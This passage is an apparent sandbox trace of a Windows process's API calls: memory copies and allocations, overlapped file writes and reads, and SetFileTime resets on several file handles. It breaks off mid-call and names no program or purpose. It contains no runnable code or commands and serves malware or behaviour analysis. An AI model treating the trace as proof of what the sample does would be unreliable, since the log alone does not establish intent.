[0076.591] memcpy (in: _Dst=0x206b96e, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b96e) returned 0x206b96e [0076.591] memcpy (in: _Dst=0x206b96f, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b96f) returned 0x206b96f [0076.591] memcpy (in: _Dst=0x206b970, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b970) returned 0x206b970 [0076.591] memcpy (in: _Dst=0x206b971, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b971) returned 0x206b971 [0076.591] memcpy (in: _Dst=0x206b972, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b972) returned 0x206b972 [0076.591] memcpy (in: _Dst=0x206b973, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b973) returned 0x206b973 [0076.591] memcpy (in: _Dst=0x206b974, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b974) returned 0x206b974 [0076.591] memcpy (in: _Dst=0x206b975, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b975) returned 0x206b975 [0076.591] memcpy (in: _Dst=0x206b976, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b976) returned 0x206b976 [0076.591] memcpy (in: _Dst=0x206b977, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b977) returned 0x206b977 [0076.591] memcpy (in: _Dst=0x206b978, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b978) returned 0x206b978 [0076.591] memcpy (in: _Dst=0x206b979, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b979) returned 0x206b979 [0076.591] memcpy (in: _Dst=0x206b97a, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b97a) returned 0x206b97a [0076.591] memcpy (in: _Dst=0x206b97b, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b97b) returned 0x206b97b [0076.591] memcpy (in: _Dst=0x206b97c, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b97c) returned 0x206b97c [0076.592] memcpy (in: _Dst=0x206b97d, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b97d) returned 0x206b97d [0076.592] memcpy (in: _Dst=0x206b97e, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b97e) returned 0x206b97e [0076.592] memcpy (in: _Dst=0x206b97f, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b97f) returned 0x206b97f [0076.592] memcpy (in: _Dst=0x206b980, _Src=0x2f4fbdc, _Size=0x1 | out: _Dst=0x206b980) returned 0x206b980 [0076.592] memcpy (in: _Dst=0x206b982, _Src=0x2f4fdc8, _Size=0x20 | out: _Dst=0x206b982) returned 0x206b982 [0076.592] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0076.592] memcpy (in: _Dst=0x2060778, _Src=0x206b8a2, _Size=0x100 | out: _Dst=0x2060778) returned 0x2060778 [0076.592] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0076.592] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0076.593] free (_Block=0x2060778) [0076.593] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0076.593] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0076.593] calloc (_Count=0x1, _Size=0x4) returned 0x2064be0 [0076.593] calloc (_Count=0x81, _Size=0x4) returned 0x20ab8d0 [0076.593] memcpy (in: _Dst=0x20ab8d0, _Src=0x2064be0, _Size=0x4 | out: _Dst=0x20ab8d0) returned 0x20ab8d0 [0076.593] free (_Block=0x2064be0) [0076.593] calloc (_Count=0x81, _Size=0x4) returned 0x20abae0 [0076.593] memcpy (in: _Dst=0x20abae0, _Src=0x20ab8d0, _Size=0x204 | out: _Dst=0x20abae0) returned 0x20abae0 [0076.593] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0076.593] memcpy (in: _Dst=0x2060778, _Src=0x2060448, _Size=0x100 | out: _Dst=0x2060778) returned 0x2060778 [0076.593] calloc (_Count=0x83, _Size=0x4) returned 0x20abcf0 [0076.593] calloc (_Count=0x2, _Size=0x4) returned 0x2064be0 [0076.593] calloc (_Count=0x3, _Size=0x4) returned 0x2060078 [0076.593] calloc (_Count=0x41, _Size=0x4) returned 0x2062c88 [0076.593] memcpy (in: _Dst=0x2062c88, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062c88) returned 0x2062c88 [0076.594] free (_Block=0x2060778) [0076.594] calloc (_Count=0x81, _Size=0x4) returned 0x20abf08 [0076.594] memcpy (in: _Dst=0x20abf08, _Src=0x2062c88, _Size=0x104 | out: _Dst=0x20abf08) returned 0x20abf08 [0076.594] free (_Block=0x2062c88) [0076.594] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.594] memcpy (in: _Dst=0x2064b90, _Src=0x2064be0, _Size=0x8 | out: _Dst=0x2064b90) returned 0x2064b90 [0076.594] calloc (_Count=0x3, _Size=0x4) returned 0x2060090 [0076.594] memcpy (in: _Dst=0x2060090, _Src=0x2064be0, _Size=0x8 | out: _Dst=0x2060090) returned 0x2060090 [0076.594] free (_Block=0x2064be0) [0076.594] free (_Block=0x2064b90) [0076.594] calloc (_Count=0x42, _Size=0x4) returned 0x2062c88 [0076.594] memcpy (in: _Dst=0x2062c88, _Src=0x2060090, _Size=0xc | out: _Dst=0x2062c88) returned 0x2062c88 [0076.595] free (_Block=0x2060090) [0076.595] calloc (_Count=0x81, _Size=0x4) returned 0x20ac118 [0076.595] memcpy (in: _Dst=0x20ac118, _Src=0x2062c88, _Size=0x108 | out: _Dst=0x20ac118) returned 0x20ac118 [0076.595] free (_Block=0x2062c88) [0076.595] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.595] memcpy (in: _Dst=0x2064b90, _Src=0x20ac118, _Size=0x8 | out: _Dst=0x2064b90) returned 0x2064b90 [0076.595] free (_Block=0x2064b90) [0076.595] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.595] memcpy (in: _Dst=0x2064b90, _Src=0x20ac118, _Size=0x8 | out: _Dst=0x2064b90) returned 0x2064b90 [0076.595] free (_Block=0x2064b90) [0076.596] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.596] memcpy (in: _Dst=0x2064b90, _Src=0x20ac118, _Size=0x8 | out: _Dst=0x2064b90) returned 0x2064b90 [0076.596] free (_Block=0x2064b90) [0076.596] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.596] memcpy (in: _Dst=0x2064b90, _Src=0x20ac118, _Size=0x8 | out: _Dst=0x2064b90) returned 0x2064b90 [0076.596] free (_Block=0x2064b90) [0076.596] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.596] memcpy (in: _Dst=0x2064b90, _Src=0x20ac118, _Size=0x8 | out: _Dst=0x2064b90) returned 0x2064b90 [0076.596] free (_Block=0x2064b90) [0076.596] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.596] memcpy (in: _Dst=0x2064b90, _Src=0x20ac118, _Size=0x8 | out: _Dst=0x2064b90) returned 0x2064b90 [0076.596] free (_Block=0x2064b90) [0076.596] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.596] memcpy (in: _Dst=0x2064b90, _Src=0x20ac118, _Size=0x8 | out: _Dst=0x2064b90) returned 0x2064b90 [0076.596] free (_Block=0x2064b90) [0076.596] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.596] memcpy (in: _Dst=0x2064b90, _Src=0x20ac118, _Size=0x8 | out: _Dst=0x2064b90) returned 0x2064b90 [0076.596] free (_Block=0x2064b90) [0076.596] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.596] free (_Block=0x2064b90) [0076.596] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.596] free (_Block=0x2064b90) [0076.596] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.597] free (_Block=0x2064b90) [0076.597] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.598] free (_Block=0x2064b90) [0076.598] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.599] free (_Block=0x2064b90) [0076.599] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.600] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.600] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.601] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.601] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.602] free (_Block=0x2064b90) [0076.602] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.603] free (_Block=0x2064b90) [0076.603] calloc (_Count=0x2, _Size=0x4) returned 0x2064b90 [0076.604] free (_Block=0x2064b90) [0076.604] free (_Block=0x20abae0) [0076.605] free (_Block=0x20abf08) [0076.605] free (_Block=0x20abcf0) [0076.605] free (_Block=0x20ac118) [0076.605] free (_Block=0x2060078) [0076.606] free (_Block=0x2062da0) [0076.606] free (_Block=0x53fcc0) [0076.607] free (_Block=0x2062eb8) [0076.607] WriteFile (in: hFile=0x394, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0076.607] GetLastError () returned 0x3e5 [0076.607] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.613] WriteFile (in: hFile=0x394, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x133b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0076.613] GetLastError () returned 0x3e5 [0076.613] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.690] SetFileTime (hFile=0x3a4, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0076.690] CloseHandle (hObject=0x3a4) returned 1 [0076.692] free (_Block=0x20abae0) [0076.692] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.731] ReadFile (in: hFile=0x3a8, lpBuffer=0x20ebb84, nNumberOfBytesToRead=0x66, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50 | out: lpBuffer=0x20ebb84, lpNumberOfBytesRead=0x0, lpOverlapped=0x20ebb50) returned 0x0 [0076.731] GetLastError () returned 0x3e5 [0076.731] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.747] ReadFile (in: hFile=0x3a4, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x66, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0076.748] GetLastError () returned 0x3e5 [0076.748] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.761] ReadFile (in: hFile=0x3ac, lpBuffer=0x394007c, nNumberOfBytesToRead=0x12ae, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0076.784] GetLastError () returned 0x3e5 [0076.784] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.786] SetFileTime (hFile=0x3ac, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0076.786] CloseHandle (hObject=0x3ac) returned 1 [0076.791] free (_Block=0x3940048) [0076.791] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.876] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0076.876] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0076.877] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0076.877] free (_Block=0x2060778) [0076.877] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0076.877] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0076.878] free (_Block=0x2062da0) [0076.878] free (_Block=0x53fcc0) [0076.879] free (_Block=0x2062eb8) [0076.879] WriteFile (in: hFile=0x3b0, lpBuffer=0x39800ec*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x39800b8 | out: lpBuffer=0x39800ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x39800b8) returned 1 [0076.879] GetLastError () returned 0x3e5 [0076.879] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.880] WriteFile (in: hFile=0x3b0, lpBuffer=0x39800ec*, nNumberOfBytesToWrite=0x1170, lpNumberOfBytesWritten=0x0, lpOverlapped=0x39800b8 | out: lpBuffer=0x39800ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x39800b8) returned 1 [0076.880] GetLastError () returned 0x3e5 [0076.880] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.965] ReadFile (in: hFile=0x3b0, lpBuffer=0x206b894, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 1 [0076.973] GetLastError () returned 0x3e5 [0076.973] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0076.975] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0076.976] CloseHandle (hObject=0x3b0) returned 1 [0076.997] free (_Block=0x206b860) [0076.998] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.000] SetFileTime (hFile=0x3b0, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.000] CloseHandle (hObject=0x3b0) returned 1 [0077.002] free (_Block=0x206b860) [0077.003] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.026] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.026] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.026] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.027] free (_Block=0x2060778) [0077.027] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.027] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.028] free (_Block=0x2062da0) [0077.028] free (_Block=0x53fcc0) [0077.028] free (_Block=0x2062eb8) [0077.028] WriteFile (in: hFile=0x3b4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.029] GetLastError () returned 0x3e5 [0077.029] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.029] WriteFile (in: hFile=0x3b4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.029] GetLastError () returned 0x3e5 [0077.029] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.240] SetFileTime (hFile=0x3b8, lpCreationTime=0x41d2cc, lpLastAccessTime=0x41d2cc, lpLastWriteTime=0x41d2cc) returned 1 [0077.240] CloseHandle (hObject=0x3b8) returned 1 [0077.242] free (_Block=0x20abae0) [0077.242] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.255] WriteFile (in: hFile=0x3b4, lpBuffer=0x206b894*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x206b860) returned 1 [0077.256] GetLastError () returned 0x3e5 [0077.256] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.269] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.269] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.269] memcpy (in: _Dst=0x2062eb8, _Src=0x2060778, _Size=0x100 | out: _Dst=0x2062eb8) returned 0x2062eb8 [0077.270] free (_Block=0x2060778) [0077.270] calloc (_Count=0x41, _Size=0x4) returned 0x2062da0 [0077.270] calloc (_Count=0x82, _Size=0x4) returned 0x53fcc0 [0077.270] free (_Block=0x2062da0) [0077.271] free (_Block=0x53fcc0) [0077.271] free (_Block=0x2062eb8) [0077.271] WriteFile (in: hFile=0x3b0, lpBuffer=0x20abb14*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 1 [0077.271] GetLastError () returned 0x3e5 [0077.271] GetQueuedCompletionStatus (in: CompletionPort=0x1e4, lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2f4fc4c, lpCompletionKey=0x2f4fc5c, lpOverlapped=0x2f4fc58) returned 1 [0077.298] calloc (_Count=0x40, _Size=0x4) returned 0x2060778 [0077.298] calloc (_Count=0x41, _Size=0x4) returned 0x2062eb8 [0077.298] memcpy (in: _Dst=0x2062eb8, 